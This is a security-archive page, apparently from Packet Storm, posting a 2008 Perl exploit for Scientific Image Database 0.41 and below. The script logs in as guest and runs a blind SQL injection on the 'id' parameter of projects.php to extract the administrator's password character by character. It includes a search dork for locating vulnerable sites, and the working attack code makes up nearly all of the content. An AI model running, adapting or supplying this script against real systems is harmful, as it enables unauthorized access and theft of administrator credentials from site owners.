exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

scientific-sql.txt

scientific-sql.txt
Posted Jun 23, 2008
Authored by t0pp8uzz

Scientific Image Database versions 0.41 and below blind SQL injection exploit.

tags | exploit, sql injection
SHA-256 | 4c5181d2a6bad520c38bb0aaff33be9658f0047fe56295a72e7e00c1342e9fa3

scientific-sql.txt

Change Mirror Download
#!/usr/bin/perl

use strict;
use warnings;
use LWP::UserAgent;

# Download: http://sidb.sourceforge.net/
# Dork: "Scientific Image DataBase"
# This exploit retrives the admin username/password via blind mysql injection.


print <<INFO; # heredocs is ugly.. so is my INFO ;)
-------------------------------------
- Scientific Image DataBase <= 0.41 -
- Blind SQL Injection Exploit -
- -
- Coded && Discovered By: t0pP8uZz -
- Discovered On: 19 JUNE 2008 -
-------------------------------------
-Greetz: muts, perlunderground, h-y -
- cipher, milw0rm -
-------------------------------------

INFO

print "Enter URL(ie: http://site.com): ";
chomp(my $url=<STDIN>);

my ($substr, $done, $chr, $res) = (1, 1, 48, "");

my $ua = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)', cookie_jar => {} );
$ua->post($url."/login.php", { 'logon' => 'true', 'user' => 'guest', 'pwd' => 'guest', 'submit' => 'Login' } );

while($done) {
my $content = $ua->get($url."/projects.php?show=true&id=57%20and%20ascii(substring((select%20pwd%20from%20users%20where%20userid=1),".$substr.",1))=".$chr);

if($content->content =~ /Not meant/ && length($res) == 32) { $done = 0; }
elsif($content->content !~ /Not meant/) { $res .= chr($chr); $substr++; $chr = 48; }
else { $chr++; }
}
print "Username: sysadmin Password: ".$res."\n";
exit;

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close